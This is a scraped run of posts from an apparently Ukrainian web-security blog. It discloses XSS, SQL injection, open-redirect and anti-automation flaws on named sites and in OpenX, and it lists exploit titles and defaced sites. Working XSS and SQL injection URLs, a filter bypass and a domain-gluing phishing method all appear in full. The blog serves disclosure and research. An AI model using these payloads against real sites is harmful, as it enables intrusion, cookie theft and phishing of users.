Websecurity - Веб безпека

У серпні, 11.08.2008, я знайшов нові уразливості на проекті http://www.rozetka.com.ua (онлайн магазин). Це Cross-Site Scripting та Insufficient Anti-automation уразливості. Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно уразливостей на сайтах онлайн магазинів останній раз я писав про уразливості на tvshop.com.ua. Також раніше я вже писав про уразливості на www.rozetka.com.ua.

XSS:

• alert(document.cookie)
• цікавий
• html включення

Insufficient Anti-automation:

http://www.rozetka.com.ua/register.php
http://www.rozetka.com.ua/ru/contacts/index.html

На сторінці реєстрації та сторінці контактів немає захисту від автоматизованих запитів (капчі).

Дані уразливості досі не виправлені.

В продовження моєї статті про URL Spoofing атаки в браузерах та пошукових системах, я розповім вам про нову цікаву атаку на пошукові системи.

Як я розповідав в своїх попередніх трьох дослідженнях, пошуковці можуть бути використані для URL Spoofing атак, а також ця атака може бути використанна для цілей SEO. І зараз я розповім про нову атаку на пошуковці, яку я назвав Засмічення пошукових систем (Search engine obstruction).

Дана Search engine obstruction атака - скорочено SEO атака - може бути проведена проти будь-якої пошукової системи, чиї павуки підтримують %20 чи інші url-encoded символи, про що я писав у перших двох своїх дослідженнях про URL Spoofing уразливості.

Ідея атаки наступна.

Потрібно надати деяку кількість URL павуку пошукої системи, які не будуть працювати в браузерах, але будуть проіндексовані пошуковцем. Дані URL повинні містити %20 чи інші url-encoded символи. Після цього користувач зайде на даний пошуковець (що був SEO атакований) та введе деякий запит, в серпі користувач натисне на деяку лінку (що буде містити, наприклад, %20) і вона не спрацює - не відкриється у браузері. Користувач натисне на деякі інші лінки (чи однієї некоректної лінки буде достатньо для нього - це залежить від людини), і якщо він побачить те саме (лінки не спрацюють), тоді він піде до іншої пошукової системи.

Я виявив дану атаку коли 29.04.2009 досліджував URL Spoofing уразливість в Yahoo (раніше я вже наводив приклад сайта вразливого до URL Spoofing, що був проіндексований Yahoo).

Ось приклад дорка, який демонструє чимало подібних сайтів в Yahoo:

http://search.yahoo.com/search?p=inurl%3A%2520www

7 з 10 сайтів на першій сторінці серпа (проіндексованих Yahoo! Slurp) не відкриються в жодному браузері - ні в нових браузерах, що не підримують %20, ні в старих браузерах Mozilla та IE6 (і нових IE7 та IE8), що підтримують %20.

Search engine obstruction атака може використовуватися для засмічення індексів пошукових систем та для впливу на їх репутації. Зокрема дані атаки можуть проводитися конкурентами. Тільки представте: лінки в серпі не працюють в Yahoo, тоді користувачі підуть до Google, і навпаки, а якщо лінки не працюють в обох Yahoo і Google, тоді користувачі підуть до Microsoft Live Search . Кожен розробник пошукової системи може використати дану атаку для своєї вигоди. Тому дана атака може бути небезпечною для кожного пошуковця.

11.09.2007

У січні, 09.01.2007 (а також додатково сьогодні), я знайшов Cross-Site Scripting, SQL DB Structure Extraction, Full path disclosure, SQL Injection та DoS уразливості на проекті http://www.pk.kiev.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

05.05.2009

Зараз сайт http://www.pk.kiev.ua змінив домен на http://mycityua.com.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

SQL DB Structure Extraction:

http://www.pk.kiev.ua/search/?search=-

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=10-

http://www.pk.kiev.ua/search/?search=1&ordnung=date-

Full path disclosure:

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=10-

SQL Injection:

http://www.pk.kiev.ua/search/?search=news&section%5B10%5D=1000%20or%201=1/*

DoS (через SQL Injection):

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=1%20or%20chapter!=1000/*

Дані уразливості вже виправлені. Але як щойно глянув, в пошуці на оновленому сайті також є уразливості (Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection), про що я з часом напишу.

В даній добірці експлоіти в веб додатках:

• Agavi 1.0.0 beta 5 (cmplang) Remote File Disclosure Vulnerability (деталі)
• Vibro-CMS Multiple Remote SQL Injection Vulnerabilities (деталі)
• WEBBDOMAIN Post Cart <= 1.02 (catid) SQL Injection Vulnerability (деталі)
• Joomla Component ongumatimesheet20 4b RFI Vulnerability (деталі)
• Joomla Component VirtueMart Google Base 1.1 RFI Vulnerability (деталі)
• WEBBDOMAIN WebShop 1.02 (SQL/XSS) Multiple Vulnerabilities (деталі)
• TBmnetCMS 1.0 (index.php content) Local File Inclusion Vulnerability (деталі)
• Simple Document Management System 1.1.4 SQL Injection Auth Bypass (деталі)
• WEBBDOMAIN Webshop <= 1.02 (SQL Injection) Auth Bypass Vuln (деталі)
• WEBBDOMAIN Quiz <= 1.02 (Auth Bypass) SQL Injection Vulnerability (деталі)
• WEBBDOMAIN Polls 1.01 (SQL Injection) Auth Bypass Vulnerability (деталі)
• CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability (деталі)
• Vibro-School-CMS (nID) Remote SQL injection Vulnerability (деталі)
• Joomla Component ProDesk 1.0/1.2 Local File Inclusion Vulnerability (деталі)
• KwsPHP All Version / Remote Code Execution (деталі)

У березні, 12.03.2009, я знайшов Full path disclosure, Cross-Site Scripting та Redirector уразливості в OpenX (Redirector уразливість в цій банерній системі я зустрічав на сайтах ще в 2007 році). Це популярна локальна банерна система, що раніше називалася Openads. Уразливості виявив в OpenX v2.4.7 та перевірив їх в інших версіях системи.

Full path disclosure:

http://site/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://site/openx/www/delivery/fc.php?MAX_type=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (обхід XSS фільтрів у версії 2.6.3):

http://site/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Redirector:

http://site/openx/www/delivery/ck.php?dest=http://site.com

Про редиректор в Openads / OpenX я вже писав.

Уразливі OpenX v2.4.9, OpenX v2.6.3 та попередні версії (та всі версії Openads). А до Redirector уразливі всі версії системи - OpenX v2.8.0 та попередні версії.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://wad.cs-mapping.com.ua (хакером moroccan-alien)
• http://www.ogneupor.com (хакерами з AYYILDIZ TEAM)
• http://www.rinok-ukraina.com.ua (хакером AsSerT) - 24.04.2009, зараз сайт вже виправлений адмінами
• http://www.library.crimea.ua (хакером Brkod) - 25.04.2009, зараз сайт вже виправлений адмінами
• http://ya-kianin.com.ua (хакером Cyb3rking) - 13.04.2009 - похаканий форум сайта, який вже виправлений адмінами

Нещодавно була виявлена DoS уразливість в Google Chrome. Для якої був розроблений експлоіт.

Дана уразливість перевірена автором експлоіта в Google Chrome 1.0.154.53. В мене в Google Chrome 1.0.154.48 вона не працює.

• Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit (деталі)

Уразливі Google Chrome 1.0.154.53 та попередні версії.

В даній добірці уразливості в веб додатках:

• Fones Clinic Mart SQL (деталі)
• Format string in The Dawn of Time 1.69s beta4 (деталі)
• HP Storage Essentials SRM, Remote Unauthorized Access (деталі)
• Carbon Communities forum Multiple Vulnerabilities. (деталі)
• Istant-Replay Forum Remote File Inclusion Vulnerability (деталі)
• Koobi Pro 6.25 poll Remote SQL Injection Vulnerability (деталі)
• Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities (деталі)
• Classifieds Caffe (index.php cat_id) Remote SQL Injection (деталі)
• LightNEasy v.1.2.2 flat Multiple Vulnerabilities (деталі)
• 5th avenue Shopping Cart SQL Injection (деталі)

This is English version of my URL Spoofing attacks in browsers and search engines article.

I continue the topic, which I begun in previous two advisories about URL Spoofing vulnerability in GoogleBot, Yahoo! Slurp, Mozilla and Internet Explorer, which also can exists in bots of other search engines. And I tell you about the attack which can work in all browsers and all search engines (bots of all search engines can be vulnerable).

At 29.04.2009 I found during researches, that not only url-encoded chars can be used for attack, but standard ASCII chars (from among visible chars). There are possible requests with chars AZaz09, at that AZ automatically converted to az in Mozilla (but not in IE6). And with some special chars in Mozilla (!%^&()`~-_+=) and in IE6 (!^&()`~-_+=, at that ^ and ` IE converts in url-encoded) and corresponding special chars in other browsers (- and _ are supported by all browsers).

URL Spoofing:

http://site.com.aaaaaaaaaawww.tab.net.ua/sites/blog/site_name.mikolasz/id.195/

There must be not more than 63 chars in total between dots (it’s limit on name of subdomain). So between “http://site.com.” and “.tab.net.ua” there can be up to 63 (including) chars. At that there can be arbitrary amount of such subdomains. Among different chars most suitable for attack are chars “-” and especially “_”.

http://site.com.---------------------------------------------------------------.tab.net.ua/sites/blog/site_name.mikolasz/id.195/
http://site.com._______________________________________________________________.tab.net.ua/sites/blog/site_name.mikolasz/id.195/

These attacks work in all browsers and obviously will work in all search engines. As opposed to attacks with using of url-encoded chars, which work among browsers only in Mozilla, IE6, IE7 and Safari 3.2.2 (and potentially in IE8).

Mentioned examples of attacks work in the next browsers: Mozilla 1.7.x, Internet Explorer 6 (6.0.2900.2180), Firefox 3.0.9, Opera 9.52 and Google Chrome 1.0.154.48. And must work in Internet Explorer 7, Safari 3.2.2 and potentially in IE8 and other browsers.

Conducting of attack.

As I wrote earlier, possibility of this attack depends on settings of web server, which must support any domains. So this attack can be conducted not at any web site, but only at appropriately configured ones. Particularly I found next sites, which are vulnerable to this attack: www.tab.net.ua, www.engadget.com and www.poweroptimizer.com.

I pick out two algorithms of conducting of this attack.

1. Using of the site, which has appropriate configuration of web server, which is vulnerable to this attack. Via registration at this site, or via vulnerabilities at it. Let’s look on example of www.tab.net.ua (social network).

• Register an account at www.tab.net.ua.
• Place at your site at this service the malicious code (for conducting of fishing attack, or for spreading of malware).
• Create special URL: http://bank.com._(x63).tab.net.ua/sites/blog/site_name.bad/id.1/.
• Attract victim at this URL.
• Including it’s possible to give this URL to search engines for indexation, so victims will fall into a trap through search engines.

2. Using of own site, which has appropriately configured web server.

• Place at your site the malicious code (for conducting of fishing attack, or for spreading of malware).
• Create special URL: http://bank.com._(x63).badsite.com.
• Attract victim at this URL.
• Including it’s possible to give this URL to search engines for indexation, so victims will fall into a trap through search engines.

In second case, if special antifishing services will put domain of this site (badsite.com) into their lists, than owners of the browsers with antifishing systems will be protected. But only in case, if such systems work on domain (badsite.com), not on domain with subdomains (bank.com._(x63).badsite.com). Otherwise, or filter will not work (depending on what was put into it), or bad guys will can easily bypass it by changing an URL for attack (bank.com._._(x63).badsite.com).

In first case it’ll be hard for antifishing systems to ban the site, because attacking sites will be hosted on legal and popular services.

In conclusion I said, that Internet users must be careful and attend to their security, to not become victim of URL Spoofing attack. As web sites owners must attend to security of their sites.

P.S.

Domain gluing can be used not only for URL Spoofing attack, but also for XSS attack (in some browsers), as I showed on example of www.engadget.com.

15.12.2008

У лютому, 16.02.2008, я знайшов Cross-Site Scripting уразливість на проекті http://holms.adamant.ua - пошуковій системі Холмс. Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно проектів компанії Адамант раніше я писав про уразливість на adamant.ua.

Детальна інформація про уразливість з’явиться пізніше.

01.05.2009

XSS:

• alert(document.cookie) (виправлена)
• html включення (PR6)

Дану уразливість вже виправели (тільки XSS, але не HTML Injection), але неякісно. І даний фільтр легко обходиться.

XSS:

• alert(document.cookie)
• цікавий